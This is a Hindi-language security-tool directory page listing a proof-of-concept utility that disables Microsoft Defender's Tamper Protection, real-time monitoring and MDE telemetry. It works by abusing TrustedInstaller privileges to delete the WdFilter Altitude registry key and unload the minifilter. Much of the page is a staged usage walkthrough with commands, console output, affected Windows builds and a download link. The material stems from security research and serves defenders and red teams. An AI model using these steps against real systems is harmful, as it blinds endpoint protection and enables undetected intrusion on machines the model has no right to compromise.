Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Disable-TamperProtection — एक POC जो TamperProtection और अन्य Defender / MDE घटकों को अक्षम करने के लिए है | Kitploit
उपकरण/GitHubGitHub/alteredsecurity/disable-tamperprotection
पोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगप्रतिकूल हमला
GitHubalteredsecurity/disable-tamperprotection

Disable-TamperProtection

एक POC जो TamperProtection और अन्य Defender / MDE घटकों को अक्षम करने के लिए है

रिपॉजिटरी देखें
2584032 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

टैम्पर प्रोटेक्शन और अन्य Defender / MDE घटकों को अक्षम करना

SYSTEM / TrustedInstaller विशेषाधिकारों का दुरुपयोग करके WdFilter सेटिंग्स (ALTITUDE regkey) के साथ छेड़छाड़ करना या उन्हें हटाना और कर्नेल मिनीड्राइवर को अनलोड करना संभव है, ताकि टैम्पर प्रोटेक्शन और अन्य Defender घटकों को अक्षम किया जा सके। यह Microsoft के Defender for Endpoint (MDE) को भी प्रभावित करता है, जिससे लक्ष्य पर की गई टेलीमेट्री और गतिविधियों के प्रति MDE अंधा हो जाता है।

परीक्षण के दौरान यह भेद्यता Windows के निम्नलिखित संस्करणों को प्रभावित करती पाई गई:

  • Windows Server 2022, BuildLabEx Version: 20348.1.amd64fre.fe_release.210507-1500 तक (अप्रैल 2024 अपडेट)
  • Windows Server 2019
  • Windows 10, BuildLabEx Version: 19041.1.amd64fre.vb_release.191206-1406 तक (अप्रैल 2024 अपडेट)
  • Windows 11, BuildLabEx Version: 22621.1.amd64fre.ni_release.220506-1250 तक (सितंबर 2023 अपडेट)।

बायपास और POC समझाने वाला ब्लॉग: https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components

उपयोग

नोट: लक्ष्य पर VC_redist.x64.exe (MSVC runtime) इंस्टॉल करना आवश्यक हो सकता है।

POC डेमो: https://youtu.be/MI6aVDHRix8

POC 3 चरणों में काम करता है (एडमिन विशेषाधिकार आवश्यक हैं):

root@kitploit:~
C:\> .\Disable-TamperProtection.exe
Sequential Usage: 1 --> 2 --> 3
1:      Unload WdFilter
2:      Disable Tamper Protection
3:      Disable AV/MDE
4:      Restore AV/MDE settings

POC का उपयोग करने का एक उदाहरण इस प्रकार है:

  1. WdFilter अनलोड करें:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key Value: 328010
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to delete WdFilter "Altitude" regkey.
[+] Created process ID: 3744 and assigned additional token privileges.
[+] Execute option 1 to validate!

# Upon 2nd execution if the above output repeats the target isn't vulnerable
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Enumerating WdFilter information:
        Next:   0 | Frame ID:   0 | No. of Instances:   4 | Name:        wdfilter | Altitude:          328010
[+] Restart the system or wait a few minutes for WdFilter to unload.
[+] Execute option 1 to validate!

# Restart to crash and unload WdFilter
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] WDFilter has been successfully unloaded, use option 2 to disable Tamper Protection.
  1. टैम्पर प्रोटेक्शन अक्षम करें:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 2
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 00000000000000C4
[!] Spawning registry with TrustedInstaller privileges to alter Defender "TamperProtection" regkey from 5 to 4.
[+] Created process ID: 7748 and assigned additional token privileges.
[+] Use option '3' to finally Disable AV/MDE.
  1. Defender / MDE घटक अक्षम करें:
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 3
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 000000000000011C
[!] Spawning registry with TrustedInstaller privileges to Disable 'RealtimeMonitoring' regkey.
[+] To disable other components of defender check source.
[+] Created process ID: 8040 and assigned additional token privileges.
  1. WdFilter मिनीड्राइवर, TamperProtection और Defender सेटिंग्स (रियल-टाइम) को पुनर्स्थापित/वापस लाएं। सुनिश्चित करें कि POC में लाइन 530 पर Altitude नंबर (डिफ़ॉल्ट: 328010) को उसके मूल मान पर वापस बदल दिया गया है।
root@kitploit:~
# Restart the computer after execution to restore settings successfully
C:\> .\Disable-TamperProtection.exe 4
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Make sure to change Altitude in Source (Default: 328010) and reboot computer after execution.
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to Enable 'RealtimeMonitoring' regkey.
[+] Created process ID: 5852 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to Enable 'TamperProtection' regkey.
[+] Created process ID: 2744 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to restore WdFilter "Altitude" regkey.
[+] Created process ID: 7044 and assigned additional token privileges.

संदर्भ

  • माइक्रोसॉफ्ट द्वारा मिनीफिल्टर ड्राइवरों के लिए लोड ऑर्डर समूह और एल्टीट्यूड
  • NSudo
  • superUser
  • Defender को अंधा करने पर शोध पत्र
  • FalconForce द्वारा MDE इंटर्नल्स

श्रेय

पोस्ट किया गया: Munaf Shariff (@m3rcer)

Altered Security में सुरक्षा शोधकर्ता

टूल डाउनलोड करें